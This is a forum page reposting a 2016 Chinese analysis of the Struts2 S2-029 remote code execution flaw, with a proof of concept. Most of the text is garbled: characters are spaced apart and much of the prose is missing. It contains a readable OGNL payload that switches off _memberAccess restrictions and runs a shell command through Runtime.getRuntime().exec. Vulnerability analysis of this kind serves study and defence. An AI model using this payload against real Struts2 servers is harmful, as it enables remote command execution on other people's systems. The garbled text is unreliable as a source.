搜索

[9925] 2016-03-18_S2-029Struts2标签远程代码执行分析(含POC)

文档创建者:s7ckTeam
浏览次数:54
最后更新:2025-01-18
2016-03-18_S2-029Struts2标签远程代码执行分析(含POC) S 2 - 0 2 9   S t r u t s 2   P O C   F r e e B u f   2 0 1 6 - 0 3 - 1 8 0 x 0 0   S t r u t s 2 s t r u t s 2   S t r u t s 2 使 S t r u t s 2 s t r u t s 2   s t r t u s 2 使 j s p   V e l o c i t y   F r e e M a r k e r 使 0 x 0 1   s t r u t s 2 i 1 8 n , t e x t   n a m e o g n l 使 n a m e   i 1 8 n i 1 8 n n a m e   : f i n d S t r i n g c o m . o p e n s y m p h o n y . x w o r k 2 . o g n l . O g n l V a l u e S t a c k p r o t e c t e d   O b j e c t   f i n d V a l u e ( S t r i n g e x p r ,   S t r i n g   f i e l d ,   S t r i n g   e r r o r M s g )   o g n l
f i n d V a l u e c o m . o p e n s y m p h o n y . x w o r k 2 . o g n l . O g n l V a l u e S t a c k p u b l i c   O b j e c t   f i n d V a l u e ( S t r i n g e x p r ,   b o o l e a n   t h r o w E x c e p t i o n O n F a i l u r e )   o g n l : r e q u e s t l a n   o g n l % { r e q u e s t . l a n } ,   o g n l n a m e n a m e o g n l ,   o g n l / t m p d b a p p t e s t   p o c # _ m e m b e r A c c e s s [ ' a l l o w P r i v a t e A c c e s s ' ] = t r u e   访 p r i v a t e # _ m e m b e r A c c e s s [ ' a l l o w S t a t i c M e t h o d A c c e s s ' ] = t r u e   # _ m e m b e r A c c e s s [ ' e x c l u d e d P a c k a g e N a m e P a t t e r n s ' ] = # _ m e m b e r A c c e s s [ ' a c c e p t P r o p e r t i e s ' ] # _ m e m b e r A c c e s s [ ' e x c l u d e d C l a s s e s ' ] = # _ m e m b e r A c c e s s [ ' a c c e p t P r o p e r t i e s ' ]
# a = @ j a v a . l a n g . R u n t i m e @ g e t R u n t i m e ( ) , # a . e x e c ( ' t o u c h / t m p / d b a p p t e s t ' ) , n e w   j a v a . l a n g . S t r i n g ( ' ' ) 0 x 0 2   p o c *   F r e e B u f F r e e B u f . C O M

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理